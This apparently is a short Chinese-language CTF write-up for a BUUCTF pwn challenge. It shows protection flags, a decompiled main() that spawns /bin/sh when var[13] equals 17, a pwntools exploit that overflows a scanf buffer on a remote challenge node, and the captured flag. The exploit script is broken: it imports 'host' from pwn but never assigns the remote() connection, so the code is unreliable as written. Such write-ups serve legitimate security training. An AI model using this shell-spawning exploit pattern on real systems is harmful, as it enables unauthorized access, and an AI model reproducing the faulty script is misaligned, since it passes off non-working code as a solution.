分析
1 2 3 4 5
| Arch: i386-32-little RELRO: Partial RELRO Stack: Canary found NX: NX enabled PIE: PIE enabled
|
保护全开
ida查看一下逻辑:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40
| int __cdecl main(int argc, const char **argv, const char **envp) { int v4; int v5;
var[13] = 0; var[14] = 0; init(); puts("What's your name?"); __isoc99_scanf("%s", var, v4, v5); if ( *(_QWORD *)&var[13] ) { if ( *(_QWORD *)&var[13] == 17LL ) system("/bin/sh"); else printf( "something wrong! val is %d", var[0], var[1], var[2], var[3], var[4], var[5], var[6], var[7], var[8], var[9], var[10], var[11], var[12], var[13], var[14]); } else { printf("%s, Welcome!\n", var); puts("Try do something~"); } return 0; }
|
道理很简单,就是当var[13] == 17LL,就可以拿到shell了,直接构造数组:
var[13]其实是第14个数,所以乘13,乘4是因为4字节
exp
1 2 3 4 5
| from pwn import host remote("node5.buuoj.cn",29636) buf=b'a'*13*4+p64(17) host.sendline(buf) host.interactive()
|
flag{b11bc65e-7182-4b10-8f5e-90b8d95fe80c}